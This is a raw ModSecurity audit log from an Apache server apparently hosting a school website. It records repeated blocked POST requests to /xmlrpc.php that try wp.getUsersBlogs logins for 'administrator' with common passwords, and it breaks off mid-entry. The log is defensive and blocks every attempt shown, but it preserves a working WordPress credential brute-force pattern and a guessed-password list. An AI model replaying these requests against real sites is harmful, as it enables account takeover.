User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --888fa613-C-- wp.getUsersBlogs administrator 1g2w3e4r --888fa613-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --888fa613-E-- --888fa613-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (22+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745077512492909 5445 (- - -) Stopwatch2: 1745077512492909 5445; combined=3922, p1=477, p2=3251, p3=0, p4=0, p5=114, sr=86, sw=80, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --888fa613-Z-- --07c6b976-A-- [19/Apr/2025:22:46:13 +0700] aAPFRQ6cTFSgLAHl7PpKgQAAAA0 103.236.140.4 53648 103.236.140.4 8181 --07c6b976-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --07c6b976-C-- wp.getUsersBlogs administrator yankees --07c6b976-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --07c6b976-E-- --07c6b976-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745077573042780 5462 (- - -) Stopwatch2: 1745077573042780 5462; combined=3906, p1=482, p2=3219, p3=0, p4=0, p5=117, sr=87, sw=88, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --07c6b976-Z-- --ab094679-A-- [19/Apr/2025:22:47:14 +0700] aAPFgg6cTFSgLAHl7PpKrAAAABc 103.236.140.4 53948 103.236.140.4 8181 --ab094679-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ab094679-C-- wp.getUsersBlogs administrator london --ab094679-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab094679-E-- --ab094679-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745077634023040 5623 (- - -) Stopwatch2: 1745077634023040 5623; combined=4060, p1=514, p2=3191, p3=0, p4=0, p5=193, sr=102, sw=162, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab094679-Z-- --074c3247-A-- [19/Apr/2025:22:48:22 +0700] aAPFxkruoUXZj665VUFuLwAAAMw 103.236.140.4 54288 103.236.140.4 8181 --074c3247-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 237 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --074c3247-C-- wp.getUsersBlogs administrator administrator@1981 --074c3247-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --074c3247-E-- --074c3247-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745077702180254 5264 (- - -) Stopwatch2: 1745077702180254 5264; combined=3801, p1=442, p2=3183, p3=0, p4=0, p5=103, sr=87, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --074c3247-Z-- --f4906e23-A-- [19/Apr/2025:22:49:24 +0700] aAPGBEruoUXZj665VUFuYwAAANQ 103.236.140.4 54576 103.236.140.4 8181 --f4906e23-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 232 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f4906e23-C-- wp.getUsersBlogs administrator marketing2019 --f4906e23-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f4906e23-E-- --f4906e23-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (26+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745077764576334 5407 (- - -) Stopwatch2: 1745077764576334 5407; combined=3860, p1=445, p2=3235, p3=0, p4=0, p5=108, sr=86, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f4906e23-Z-- --26fdec21-A-- [19/Apr/2025:22:50:26 +0700] aAPGQnNa4dA2HllpK_PkxgAAAIc 103.236.140.4 54914 103.236.140.4 8181 --26fdec21-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --26fdec21-C-- wp.getUsersBlogs administrator newcastle --26fdec21-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --26fdec21-E-- --26fdec21-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (43+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745077826050228 5393 (- - -) Stopwatch2: 1745077826050228 5393; combined=3810, p1=450, p2=3156, p3=0, p4=0, p5=116, sr=86, sw=88, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --26fdec21-Z-- --5effb900-A-- [19/Apr/2025:22:51:27 +0700] aAPGfw6cTFSgLAHl7PpLBQAAAAE 103.236.140.4 55250 103.236.140.4 8181 --5effb900-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 242 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5effb900-C-- wp.getUsersBlogs administrator smkn22-jkt.sch.id123456 --5effb900-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5effb900-E-- --5effb900-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (46+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745077887863245 5027 (- - -) Stopwatch2: 1745077887863245 5027; combined=3972, p1=426, p2=3371, p3=0, p4=0, p5=102, sr=85, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5effb900-Z-- --b5960603-A-- [19/Apr/2025:22:52:34 +0700] aAPGwkruoUXZj665VUFuvwAAAM8 103.236.140.4 55574 103.236.140.4 8181 --b5960603-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --b5960603-C-- wp.getUsersBlogs administrator test1 --b5960603-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5960603-E-- --b5960603-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (21+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745077954239472 5756 (- - -) Stopwatch2: 1745077954239472 5756; combined=3917, p1=501, p2=3243, p3=0, p4=0, p5=103, sr=91, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5960603-Z-- --374a3c26-A-- [19/Apr/2025:22:53:38 +0700] aAPHAnNa4dA2HllpK_Pk4wAAAI8 103.236.140.4 55882 103.236.140.4 8181 --374a3c26-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --374a3c26-C-- wp.getUsersBlogs administrator Admin12 --374a3c26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --374a3c26-E-- --374a3c26-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745078018359509 4993 (- - -) Stopwatch2: 1745078018359509 4993; combined=3810, p1=456, p2=3155, p3=0, p4=0, p5=115, sr=87, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --374a3c26-Z-- --4c0a1b51-A-- [19/Apr/2025:22:54:38 +0700] aAPHPuvDiFC_ir7MDwZPuAAAAEY 103.236.140.4 56166 103.236.140.4 8181 --4c0a1b51-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --4c0a1b51-C-- wp.getUsersBlogs administrator nimda --4c0a1b51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4c0a1b51-E-- --4c0a1b51-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (18+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745078078713648 5315 (- - -) Stopwatch2: 1745078078713648 5315; combined=4199, p1=497, p2=3522, p3=0, p4=0, p5=106, sr=90, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4c0a1b51-Z-- --6d41e22a-A-- [19/Apr/2025:22:55:38 +0700] aAPHeuvDiFC_ir7MDwZP4QAAAEU 103.236.140.4 56456 103.236.140.4 8181 --6d41e22a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6d41e22a-C-- wp.getUsersBlogs administrator 121212 --6d41e22a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6d41e22a-E-- --6d41e22a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745078138336663 4345 (- - -) Stopwatch2: 1745078138336663 4345; combined=3323, p1=342, p2=2805, p3=0, p4=0, p5=102, sr=74, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d41e22a-Z-- --aa588b7c-A-- [19/Apr/2025:22:56:40 +0700] aAPHuHNa4dA2HllpK_PlKQAAAI8 103.236.140.4 56940 103.236.140.4 8181 --aa588b7c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --aa588b7c-C-- wp.getUsersBlogs administrator 123.456 --aa588b7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa588b7c-E-- --aa588b7c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (50+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745078200817406 5514 (- - -) Stopwatch2: 1745078200817406 5514; combined=3899, p1=456, p2=3276, p3=0, p4=0, p5=98, sr=88, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa588b7c-Z-- --87539c7b-A-- [19/Apr/2025:22:57:40 +0700] aAPH9EruoUXZj665VUFvcgAAAMs 103.236.140.4 57280 103.236.140.4 8181 --87539c7b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --87539c7b-C-- wp.getUsersBlogs administrator office --87539c7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --87539c7b-E-- --87539c7b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (22+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745078260406869 5731 (- - -) Stopwatch2: 1745078260406869 5731; combined=4454, p1=558, p2=3669, p3=0, p4=0, p5=129, sr=129, sw=98, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87539c7b-Z-- --8221a460-A-- [19/Apr/2025:22:58:44 +0700] aAPINOvDiFC_ir7MDwZQPAAAAFM 103.236.140.4 57610 103.236.140.4 8181 --8221a460-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8221a460-C-- wp.getUsersBlogs administrator Qwerty --8221a460-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8221a460-E-- --8221a460-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (33+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745078324414149 5624 (- - -) Stopwatch2: 1745078324414149 5624; combined=4331, p1=529, p2=3599, p3=0, p4=0, p5=119, sr=90, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8221a460-Z-- --27378a2b-A-- [19/Apr/2025:22:59:45 +0700] aAPIcXNa4dA2HllpK_PlWwAAAIw 103.236.140.4 57916 103.236.140.4 8181 --27378a2b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --27378a2b-C-- wp.getUsersBlogs administrator 123456qwe --27378a2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --27378a2b-E-- --27378a2b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (35+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745078385417159 5213 (- - -) Stopwatch2: 1745078385417159 5213; combined=3888, p1=455, p2=3231, p3=0, p4=0, p5=126, sr=90, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --27378a2b-Z-- --8a4e0971-A-- [19/Apr/2025:23:00:50 +0700] aAPIsg6cTFSgLAHl7PpL_QAAABI 103.236.140.4 58228 103.236.140.4 8181 --8a4e0971-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8a4e0971-C-- wp.getUsersBlogs administrator rockyou --8a4e0971-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a4e0971-E-- --8a4e0971-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745078450210157 4929 (- - -) Stopwatch2: 1745078450210157 4929; combined=3811, p1=456, p2=3175, p3=0, p4=0, p5=106, sr=79, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a4e0971-Z-- --3637d37c-A-- [19/Apr/2025:23:01:17 +0700] aAPIzQ6cTFSgLAHl7PpMEAAAAAE 103.236.140.4 58362 103.236.140.4 